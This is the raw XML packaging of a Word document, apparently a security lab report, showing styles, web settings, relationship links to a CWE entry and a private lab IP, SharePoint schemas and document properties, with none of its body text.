    <w:rsid w:val="00E5197B"/>
    <w:rsid w:val="00F14AD8"/>
    <w:rsid w:val="00F4497B"/>
    <w:rsid w:val="00FC616F"/>
    <w:rsid w:val="00FD53B2"/>
    <w:rsid w:val="00FD73CF"/>
    <w:rsid w:val="3EE847B1"/>
    <w:rsid w:val="5D8FDB31"/>
    <w:rsid w:val="6A5B04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CB500"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2654D0D1-8E18-4FAF-BDE1-335BD96EA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2E20"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>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7145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A5F39"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006A5F39"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009D41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41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390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0390B"/>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82E20"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00123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1459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30EBB"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00930EBB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00930EBB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00930EBB"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C1D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D22"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C1D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D22"/>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent3">
    <w:name w:val="Grid Table 4 Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="4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paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006034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603428"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000603E0"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF79E7"/>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DF79E7"/>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F79E7"/>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1935057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="310214207">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="301542840">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="241566430">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1251619670">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="427625254">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="502165336">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="100"/>
                              <w:marBottom w:val="100"/>
                              <w:divBdr>
                                <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1104838545">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                    <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                    <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="11535539">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                        <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                        <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1110515731">
                                          <w:marLeft w:val="0"/>
                                          <w:marRight w:val="0"/>
                                          <w:marTop w:val="0"/>
                                          <w:marBottom w:val="0"/>
                                          <w:divBdr>
                                            <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                            <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                            <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                          </w:divBdr>
                                          <w:divsChild>
                                            <w:div w:id="65421695">
                                              <w:marLeft w:val="0"/>
                                              <w:marRight w:val="0"/>
                                              <w:marTop w:val="0"/>
                                              <w:marBottom w:val="0"/>
                                              <w:divBdr>
                                                <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                                <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                                <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="169183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129662175">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1524976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cwe.mitre.org/data/definitions/83.html" TargetMode="External"/><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10.5.50.50/source.zip" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.5.50.50" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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10.5.50.50" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><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8.emf"/><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10.5.50.50" TargetMode="Externa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9CED372D81F7F4E9B81EF5B28922A92" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="5d0f44e29378ea10f07e3acccdbbe28e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="99f00f70-e37c-45fc-a58c-25b9fce86e97" xmlns:ns3="76dd32bb-4b56-4927-99ec-3ebca7c2e701" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a5d8880fbe4e2cabc162d7dcb115af47" ns2:_="" ns3:_="">
    <xsd:import namespace="99f00f70-e37c-45fc-a58c-25b9fce86e97"/>
    <xsd:import namespace="76dd32bb-4b56-4927-99ec-3ebca7c2e70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f00f70-e37c-45fc-a58c-25b9fce86e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6dd32bb-4b56-4927-99ec-3ebca7c2e70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FACAFD-52E8-465E-A9EA-177436C05C31}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA37E3E7-0D26-49B1-B629-3B5A9D0974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f00f70-e37c-45fc-a58c-25b9fce86e97"/>
    <ds:schemaRef ds:uri="76dd32bb-4b56-4927-99ec-3ebca7c2e7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00370FA-BFD5-4426-BD94-61BAD2CB3D7C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5ACC38FE-B361-46E4-9894-576FDF981F0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11</Pages>
  <Words>730</Words>
  <Characters>4166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 Haase</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ashish hedau</cp:lastModifiedBy>
  <cp:revision>88</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-11T22:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-01T01:59:00Z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0x010100C9CED372D81F7F4E9B81EF5B28922A92</vt:lpwstr>
  </property>
</Properties>
</file>